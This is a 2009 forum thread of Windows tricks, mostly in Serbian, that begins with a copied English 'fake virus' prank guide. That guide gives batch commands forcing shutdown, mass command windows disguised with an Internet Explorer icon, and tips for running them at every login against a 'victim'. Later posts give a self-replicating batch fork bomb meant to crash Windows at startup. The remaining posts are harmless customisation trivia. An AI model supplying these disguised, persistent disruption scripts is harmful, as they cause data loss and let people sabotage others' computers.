start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s 10 -c "Your computer has committed suicide. Have a nice day."
-For a way to have a bunch of Command Prompts pop up out of nowhere go to notepad and type in "start" alot (don't add quotations)
-Save it as whatever.bat to your desktop
-When you open it however many times you typed "start" thats how many times the command prompt will pop up
-You can disquise it as the Internet Explorer by right clicking on the fake virus and hit properties and find the button that says "Change Icon" then find the internet explorer (or mozilla firefox if you prefer or if you have the icon) icon and double click it
-It should change automatically after you hit OK
-To get rid of them all at once wait until it all stops popping up then click CTRL+ALT+DEL and go to task manager and click the top task and hold down CTRL+SHIFT and go down to the last task and then click it (all the tasks should be highlighted) then click "end task" and it should erase all the tasks (now here are the 50 starts)

• Video:
Another way to create a fake virus:
http://www.5min.com/Embeded/10129/&sid=102 (http://www.5min.com/Embeded/10129/&sid=102)

• Tips:
    * To make your virus more convincing, you could name it Internet Explorer and then right click your shortcut to the virus, click "Properties" than click "Change Icon". Then scroll through the list and click the Internet Explorer icon.
    * Alternatively, set your "virus" to execute every time a user logs in by navigating to Start menu-->All Programs-->Startup(Right-Click)-->Open, and copying the shortcut into the folder that opens. Be careful with the shutdown timer's value - too short an interval will make it difficult for even an experienced administrator to deactivate the virus.
    * Running batch files like these in full screen can make them even scarier and more convincing. Right click on the icon -> properties -> options -> full screen do not shut computer to early or it may not scare the victim or it wont look like a virus.
    * This does not work on Windows 98 so sorry I guess you need to upgrade soon.

(http://www.wikihow.com/skins/WikiHow/SecIcon_Warnings.gif) Warnings:
    * Only do this to someone who can handle this prank.
    * This may not work if you try to do a file transfer on windows live messenger
    * It also may scare people really badly, so remember do this for revenge(e.g someone did a mean prank so then you could use this)
    * The example provided can run on Windows.
    * This is not completely harmless, since it will shutdown your PC and force you to lose any unsaved work.
      Rest assured all should be normal when the computer is turned on again.
    * This might affect the way your computer runs or the way another computer that you hacked runs. so only do this if you are a experienced hacker. also I suggest that you save all of your contents onto a thumb drive if you decide to test it out on your computer first.
    * And remember this is in seconds not minutes. so don't type in -5 and think you'll be fine.


: Odg: Winows tricks
: M4K1 14 January, 2009, 03:56:50 AM
XP_Trikovi.rar (http://fs08n3.sendspace.com/dl/764d5dcc5c0c2c3e340384e85c386c38/496d5220416a50c5/df2xqb/XP_Trikovi.rar)


: Odg: Winows tricks
: M4K1 14 January, 2009, 11:57:16 PM
Stavi sliku u System Properties

(http://img105.imageshack.us/img105/9108/sbmycrl8.png)

Ovako:

1) otvorite Notepad i upišite npr.:

[General]
Manufacturer=S0K0B@NJ@
[Support Information]
Line1=Sokobanja, Sokograd, dodješ mlad, odeš star!

2) u Notepad idite na FileSave As... → u File name upišite oeminfo.iniSave

3) napravite sliku po izboru koja mora se naziva oemlogo.bmp i ne sme biti veæa od 200x100 rezolucije

4) fajlove oemlogo.bmp i oeminfo.ini iskopirajte u C:\windows\system folder

... toliko ;)


: Odg: Winows tricks
: M4K1 30 January, 2009, 05:01:13 PM
Kako da srušite Windows uz pomoæ Notepada

Dva prosta naèina:

1. Naèin
- otvorite Notepad i ukucajte:
start virus.bat
virus.bat
- idite na File → Save, stavite naziv fajla virus.bat, pa klik na Save
- na desktopu stvoriæe se fajl virus.bat
- pokrenite taj fajl ILI ga premestite sa desktopa u Start → All Programs → Sturtup → None, gde æe pri sledeæem podizanju Windows automatski da pokrene taj .bat fajl.

2. Naèin (CMD Bomb)
- otvorite Notepad i ukucajte:
start
%0
begin :S
- idite na File → Save, stavite naziv fajla "bilo šta".bat (bilo šta, bilo koje ime, samo bez navodika), pa klik na Save
- pokrenite taj fajl ILI ga premestite sa desktopa u Start → All Programs → Sturtup → None, gde æe pri sledeæem podizanju Windows automatski da pokrene taj .bat fajl.


: Odg: Winows tricks
: M4K1 30 January, 2009, 11:53:31 PM
WiNER!

(http://img516.imageshack.us/img516/7089/solitarecv0.th.jpg) (http://img516.imageshack.us/my.php?image=solitarecv0.jpg) (http://img132.imageshack.us/img132/5736/minesweeperrp4.th.jpg) (http://img132.imageshack.us/my.php?image=minesweeperrp4.jpg) (http://img264.imageshack.us/img264/6401/heartssn7.th.jpg) (http://img264.imageshack.us/my.php?image=heartssn7.jpg) (http://img403.imageshack.us/img403/9499/freecellof0.th.jpg) (http://img403.imageshack.us/my.php?image=freecellof0.jpg)


: Odg: Winows tricks
: M4K1 31 January, 2009, 02:07:27 AM
Kreirajte nevidljivi folder

- desni klik na desktop → New → Folder → reimenujte naziv New Folder ovako:
držite levo Alt i otkucajte broj 0160 (ovamo gde je Num Lock), pustite Alt i kliknete mišem sa strane na desktop, videæete folder bez imena :)

- desni klik na taj folder → Properties → Customize  → Change Icon... → izaberite prazno polje, bez ikone
(http://img204.imageshack.us/img204/2830/30406236dd6.jpg) → OK → OK

- da bi videli gde se nalazi taj folder, preko tastatire pritisnite Ctrl + A (to je Select All), videæete markirano mesto koje izgleda ovako: █


: Odg: Winows tricks
: Vladimir 31 January, 2009, 02:10:32 AM
Kreirajte nevidljivi folder
 

Ovo je super ...  :smiley:


: Odg: Winows tricks
: M4K1 31 January, 2009, 02:35:03 AM
u 3D Pinball, mišem upravljajte kuglicu

- startujete 3D Pinball: Start → Games → Pinball
- i u prozoru 3D Pinball samo odkucajte hidden test (da, sa razmakom na Space)
- levim klikom miša, nosi lopticu gde oæeš po tabli  :srb:


: Odg: Winows tricks
: M4K1 31 January, 2009, 03:57:57 AM
♫ Windows XP secret song ♪

idite u C:\WINDOWS\system32\oobe\images i pokrenite fajl title.wma


: Odg: Winows tricks
: M4K1 30 July, 2009, 01:53:12 PM
Lakše je gašenje kompjutera preko tastature ;)

(http://img158.imageshack.us/img158/1835/17309054.png)

nego da gaðaš mišem start -> Turn Off Computer -> Turn Off


: Odg: Winows tricks
: M4K1 31 July, 2009, 12:13:54 AM
a ovo sad tek primetih :gigle: naslov teme!

Winows tricks